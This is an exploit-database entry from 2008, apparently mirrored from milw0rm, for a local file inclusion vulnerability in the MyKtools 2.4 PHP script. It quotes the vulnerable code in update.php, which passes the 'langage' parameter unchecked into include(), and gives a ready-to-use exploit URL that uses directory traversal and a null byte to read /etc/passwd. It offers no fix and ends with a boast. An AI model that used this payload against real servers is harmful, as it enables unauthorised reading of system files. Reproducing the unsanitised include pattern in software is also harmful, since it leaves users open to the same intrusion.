MyKtools 2.4 (langage) Local File Inclusion Vulnerability
| EDB-ID: 6850 | CVE: 2008-4781 | OSVDB-ID: 49370 |
| Author: x0r | Published: 2008-10-27 | Verified:  |
Exploit Code:  | Vulnerable App: N/A |
Rating |
| EDB-ID: 6850 | CVE: 2008-4781 | OSVDB-ID: 49370 |
| Author: x0r | Published: 2008-10-27 | Verified: |
| Exploit Code: | Vulnerable App: N/A |
Rating |
##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############
Bug:
In \update.php
// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}
Exploit: \update.php?langage=../../../../../../etc/passwd%00
p0wn3d Beby.
-=EOF=-
# milw0rm.com [2008-10-27]